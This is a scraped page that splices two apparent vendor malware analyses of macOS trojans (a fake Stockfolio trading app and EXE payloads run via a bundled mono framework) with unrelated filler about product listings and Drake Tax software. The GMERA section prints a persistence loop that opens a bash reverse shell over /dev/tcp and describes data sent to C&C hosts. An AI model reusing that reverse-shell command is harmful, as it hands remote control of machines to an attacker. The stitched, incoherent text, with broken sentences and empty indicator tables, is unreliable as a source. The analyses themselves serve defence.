Trend Micro Internet Security App Mac

Trend micro internet security app mac free
  1. Trend Micro Internet Security App Mac Download
  2. Trend Micro Internet Security Mac
  3. Trend Micro Internet Security App
  4. Reinstall Trend Micro Maximum Security
  5. Install Trend Micro Security

by Luis Magisa

Unlike in the pre-internet era, when trading in the stock or commodities market involved a phone call to a broker — a move which often meant additional fees for would-be traders — the rise of trading apps placed the ability to trade in the hands of ordinary users. However, their popularity has led to their abuse by cybercriminals who create fake trading apps as lures for unsuspecting victims to steal their personal data. We recently found and analyzed an example of such an app, which had a malicious malware variant that disguised itself as a legitimate Mac-based trading app called Stockfolio.

We found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to decrypt its encrypted codes while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism.

Trend Micro 0 Update as of 6:00 P.M. PST, May 3, 2019: Our continued observation of the malware sample showed that it spoofs popular Mac apps, instead of being included in the app installers themselves as previously reported. This item: Trend Micro Maximum Security 2020 5 Devices 3 Years for PC, Mac, Android and IOS Product Key card by Trend Micro Windows 7, Mac, Android $49.98 Only 14 left in stock - order soon. Sold by YOULOVE and ships from Amazon Fulfillment. Trend Micro Security is missing on Microsoft Edge If you are unable to find Trend Micro Security under extension settings, do the following: Get the app from from Microsoft Windows Store.

Sample 1: Trojan.MacOS.GMERA.A

We found the first sample (detected as Trojan.MacOS.GMERA.A) while checking suspicious shell scripts that were flagged by our machine learning system. At first glance, it was challenging to directly identify its malicious behavior because the shell script references other files such as AppCode, .pass and .app. To verify that the behavior was indeed malicious, we sourced the parent file using both our infrastructure and the aggregate website VirusTotal (which had the sample but lacked detections from other major security vendors at the time of writing).

Sep 24, 2018  Trend Micro Security for Mac 1.5 Trend Micro Security for Mac 2.0 Worry-Free Business Security Standard/Advanced 10.0. The Trend Micro Store offers exclusive promotions and services not available anywhere else. Money Back Guarantee If you're not happy with your purchase from the Trend Micro Online Store, it can be returned within 30 days for a full refund.

Figure 1. The suspicious shell script which was flagged by our system

The initial sample we analyzed was a zip archive file (detected as Trojan.MacOS.GMERA.A) that contained an app bundle ( and a hidden encrypted file (.app). The fake app presents itself as legitimate to trick users, but we found that it contained several malicious components.

Figure 2. Content of the zip file. Note that the app bundle is missing the “o” at the end, whereas the legitimate app is called Stockfolio.

The zip file and its contents

The first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.

Comparing it to the Resources directory of the current version (1.5) found on the Stockfolio website revealed a number of differences, as shown in the figure below.

Figure 3. Comparison of the app bundle folder structure between the malware variant (top) and the legitimate app (version 1.5, bottom).

Technical Analysis

When the app is executed, an actual trading app interface will appear on-screen. However, unbeknownst to the user, the malware variant is already performing its malicious routines in the background.

Figure 4. interface displayed when the malware app bundle is executed

The main Mach-O executable will launch the following bundled shell scripts in the Resources directory:

  • plugin
  • stock

The plugin and stock shell scripts

The plugin shell script collects the following information from the infected system:

  • username
  • IP address
  • apps in /Applications
  • files in ~/Documents
  • files in ~/Desktop
  • OS installation date
  • file system disk space usage
  • graphic/display information
  • wireless network information
  • screenshots

It then encodes the collected information using base64 encoding and saves the collected information in a hidden file: /tmp/.info. It then uploads the file to hxxps://[.]php using the collected username and machine serial number as identifiers.

If a successful response is sent from the URL, it will write the response in another hidden file ~/Library/Containers/.pass

Figure 5 . The “plugin” script

The stock shell script will copy to /private/var/tmp/appcode. It then locates the .app file, which is the hidden file in the zip bundle that comes with

Figure 6. The “stock” script

It decodes the b64-encoded .app file, executes it, then drops the following:

/tmp/.privatkeyRSA private key

It will delete the .app file then check if the file ~/Library/Containers/.pass exists. Using the contents of the ‘.pass’ file as the key, the malware variant will decrypt /private/var/tmp/appcode, which is encrypted using AES-256-CBC. It then saves the decrypted file to /tmp/appcode. Finally, it will execute the appcode. If it fails to do so, it will delete the /tmp/appcode file and ~/Library/Containers/.pass. Note that in the sample we analyzed, the decryption routine failed since the sample was not able to create ~/Library/Containers/.pass.

Figure 7. Comparison of the code-signing information of the malicious app (top) and the legitimate Stockfolio app (bottom)

We suspect the file appcode is a malware file that contains additional routines. However, at the time of writing, we were unable to decrypt this file since the upload URL hxxps://[.]php was inaccessible (according to VirusTotal, the domain was active from January to February 2019). Furthermore, we suspect that the full malware routine uses the TOR network due to the presence of the unused address gmzera54l5qpa6lm[.]onion.

Sample 2: Trojan.MacOS.GMERA.B

Using the digital certificate of the first sample, we were able to find a second variant (detected as Trojan.MacOS.GMERA.B) that was uploaded to VirusTotal on June 2019. Like the first variant, it contains an embedded copy of version 1.4.13 with the malware author’s digital certificate. It launches the app in a similar manner when executed to disguise its malicious intent.

Figure 8. The bundle structure of Trojan.MacOS.GMERA.B

Once opened, Trojan.MacOS.GMERA.B will execute the embedded copy of Stockfolio version 1.4.13, after which it will launch the shell script

The script collects usernames and ip addresses from the infected machine via the following command:

  • username = ‘whoami’
  • ip address = ‘curl -s’

It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format:

  • hxxp://owpqkszz[.]info/link.php?{username}&{ip address}

As part of its routine, the malware also drops the following files:

/private/tmp/ of ~/Library/LaunchAgents/
~/Library/LaunchAgents/ mechanism
/tmp/loglogMalware execution logs

It then creates a simple reverse shell to the C&C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands.

Figure 9. Content of the shell script

One of the primary changes found in the second variant, aside from the simplified routine, is the presence of a persistence mechanism via the creation of a property list (plist) file: ~/Library/LaunchAgents/

Figure 10. Hidden plist file used for persistence

After we decoded the b64-encoded arguments for the plist file, we found the following code:

  • while :; do sleep 10000; screen -X quit; lsof -ti :25733 xargs kill -9; screen -d -m bash -c ‘bash -i >/dev/tcp/ 0>&1’; done

This code instructs the plist file to constantly create the reverse shell mentioned earlier, occuring every 10,000 seconds.

The simple reverse shell created was observed to use the ports 25733-25736.


Given the changes we’ve seen from the malware variant’s initial iteration to its current one, we notice a trend in which the malware authors have simplified its routine and added further capabilities. It’s possible that the people behind it are looking for ways to make it more efficient – perhaps even adding evasion mechanisms in the future.

In the meantime, we advise aspiring traders to practice caution when it comes to the programs they download, especially if it comes from an unknown or suspicious website. We recommend that users only download apps from official sources to minimize chances of downloading a malicious one.

We reached out to Apple before publication of this entry, and they informed us that the code signing certificate of this fake app’s developers was revoked in July of this year.

Trend Micro solutions

End users can benefit from security solutions such as Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats. Enterprises can benefit from Trend Micro’s Smart Protection Suites with XGen™ security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint.

Indicators of Compromise (IoCs)

Sample 1

FilenameSHA256Detection name

Sample 2

FilenameSHA256Detection name
Stockfoli83df2f39140679a9cfb55f9c839ff8e7638ba29dba164900f9c77bb177796e03 (sample 2)Trojan.MacOS.GMERA.B
Trial_Stockfoli.zipfaa2799751582b8829c61cbfe2cbaf3e792960835884b61046778d17937520f4 (sample 2)Trojan.MacOS.GMERA.B

Related posts:

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:

Update as of 6:00 P.M. PST, May 3, 2019: Our continued observation of the malware sample showed that it spoofs popular Mac apps, instead of being included in the app installers themselves as previously reported. We made the corrections in the technical analysis in this post. We would also like to thank Objective Development for clarifying this issue.

Update as of 5:00 P.M. PST, February 18, 2019: Further analysis on the sample indicated that it does not bypass the Gatekeeper mechanism as previously reported. We made the necessary changes in the technical analysis in this post. We would also like to thank Apple Product Security team for reaching out to us to clarify this issue.

By Don Ladores and Luis Magisa

EXE is the official executable file format used for Windows to signify that they only run on Windows platforms, and to serve as a security feature. By default, attempting to run an EXE file on a Mac or Linux OS will only show an error notification.

However, we found EXE files in the wild delivering malicious payload on macOS recently. While no specific attack pattern is seen, our telemetry showed the highest numbers for infections to be in the United Kingdom, Australia, Armenia, Luxembourg, South Africa, and the United States.


The samples pose as installers of popular apps and are often available for download from various torrent websites. Examples of the applications they pose as are as follows:


When the downloaded .ZIP file is extracted, it contains a .DMG file hosting the supposed installer of the spoofed app.

Figure 1. Sample of the malicious file.

Figure 2. Installer contained in the .DMG sample we analyzed posing as a legitimate application.

Inspecting the installer contents, we found the unusual presence of the .EXE file bundled inside the app, verified to be a Windows executable responsible for the malicious payload.

Figure 3. Suspicious .EXE bundled for Mac app installer.

When the installer is executed, the main file also launched the executable as it is enabled by the mono framework included in the bundle. This framework allows the execution of Microsoft .NET applications across platforms such as OSX.

Once run, the malware collects the following system information:

  • ModelName
  • ModelIdentifier
  • ProcessorSpeed
  • ProcessorDetails
  • NumberofProcessors
  • NumberofCores
  • Memory
  • BootROMVersion
  • SMCVersion
  • SerialNumber
  • UUID

Under the /Application directory, the malware also scans for all the basic and installed apps and sends all the information to the C&C server:

  • App
  • DVD
  • Font
  • Image
  • Mission
  • Photo
  • QuickTime
  • System
  • Time

It downloads the following files from the Internet and saves it to the directory ~/Library/X2441139MAC/Temp/:

  • hxxp://
  • hxxp://
  • hxxp://

Figure 4. Downloaded files saved in the directory.

Trend Micro Internet Security App Mac Download

These .DMG files are mounted and executed as soon as they are ready, as well as displaying a PUA during execution.

Figure 5. One of the adwares downloaded posing as a popular app.

This malware runs specifically to target Mac users. Attempting to run the sample in Windows displays an error notification. Free vision board software for mac.

Figure 6. Error notification when installer is executed in Windows.

Currently, running EXE on other platforms would have no impact on non-Windows systems such as MacOS. A mono framework installed in the system is required to compile or load these executables and libraries. In this case, however, the bundling of the said framework with the malicious files becomes a workaround to enable EXE files to run on Mac systems. As for the native library differences between Windows and MacOS, the mono framework supports DLL mapping to support Windows-only dependencies to their MacOS counterparts. Overall, this technique may be done to overcome a malicious user’s Objective-c coding limitations.


Currently there is not a Drake Tax version that is written for a Mac or Linux operating system. Some users have been able to successfully run Drake Tax on a Virtual Windows environment installed on a Mac or Linux operating system, however, this configuration is not officially supported. Drake has tested Windows 10 against the basic functions of earlier software with the following results: Drake12 to Drake14 - These Drake products are compatible with the following limitations: Some printers may require new drivers from the printer manufacturer. Some screens and views in Drake show minor differences when displayed in Windows 10. Word compatible software. Title: Drake Software System Requirements 2019 Created Date: 3/7/2019 1:52:22 PM. Jul 20, 2016  Need to find pro tax prep software compatible w/Macs. My software maker, Drake, does not have Mac version. I've checked Pro-Series (no) and maybe 1 other. I don't want to spend Lacert kind of $$ (neither do the majority of longtime Lacert users apparently). Obviously, no Turbo Tax, Tax Cut or any other commercial, deduction & crdit missing commercial software.

Trend Micro Internet Security Mac

We suspect that this specific malware can be used for future inter-platform attacks, where a single executable can perform its payload on different operating systems. We believe that the cybercriminals are still studying the development and opportunities from this malware bundled in apps and available in torrent sites. We will continue investigating how cybercriminals can use this information and routine. Users should avoid or refrain from downloading files, programs, and software from unverified sources and websites, and install a multi-layered protection for their individual and enterprise systems.

Trend Micro Internet Security App

Trend Micro Solutions

The following Trend Micro products detect and block this threat:

Reinstall Trend Micro Maximum Security

Indicators of Compromise

Main Executables












Installer (2)



C&C server

Install Trend Micro Security

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware: